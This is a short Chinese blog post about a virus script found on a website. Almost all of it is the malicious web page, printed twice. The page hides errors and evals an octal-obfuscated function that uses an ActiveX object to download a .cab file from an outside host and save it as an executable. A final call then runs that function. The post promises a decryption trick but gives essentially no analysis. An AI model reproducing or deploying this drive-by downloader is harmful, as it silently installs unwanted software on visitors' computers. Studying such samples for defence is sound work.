碰到了ysydown.exe毒霸提交竟然已经有人给提交过了
时间:2021-11-15 16:35:17|栏目:|点击: 次
从网站看到的一个病毒脚本,里面的代码太多了啊
不过发现了一个破解加密的好办法
<SCRIPT LANGUAGE='JavaScript'>
<!--
function ResumeError() {
return true;
}
window.onerror = ResumeError;
// -->
</SCRIPT>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title></title>
<script>
eval("\146\165\156\143\164\151\157\156\40\104\157\167\156\144\154\157\141\144\103\141\154\143\101\156\144\122\165\156\50\51\15\12\173\15\12\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\170\56\143\163\154\162\61\56\143\157\155\57\171\163\171\165\160\144\141\164\145\56\143\141\142\42\54\40\42\171\163\171\144\157\167\156\56\145\170\145\42\54\40\60\51\73\15\12\175");
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>
解密方法,我也是第一次这样的测试,不用去解码八进制了
[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
不过发现了一个破解加密的好办法
复制代码 代码如下:
<SCRIPT LANGUAGE='JavaScript'>
<!--
function ResumeError() {
return true;
}
window.onerror = ResumeError;
// -->
</SCRIPT>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title></title>
<script>
eval("\146\165\156\143\164\151\157\156\40\104\157\167\156\144\154\157\141\144\103\141\154\143\101\156\144\122\165\156\50\51\15\12\173\15\12\143\157\155\56\104\154\157\141\144\104\123\50\42\150\164\164\160\72\57\57\170\170\170\56\143\163\154\162\61\56\143\157\155\57\171\163\171\165\160\144\141\164\145\56\143\141\142\42\54\40\42\171\163\171\144\157\167\156\56\145\170\145\42\54\40\60\51\73\15\12\175");
</script>
</head>
<OBJECT ID = "com" CLASSID = "CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9}">
</OBJECT>
<script>
DowndloadCalcAndRun()
</script>
</html>
解密方法,我也是第一次这样的测试,不用去解码八进制了
[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
上一篇:SqlServer 2005 T-SQL Query 学习笔记(1)
栏 目:
下一篇:docker 容器上编译 go 程序提示找不到文件问题
本文标题:碰到了ysydown.exe毒霸提交竟然已经有人给提交过了
本文地址:http://www.codeinn.net/misctech/183648.html
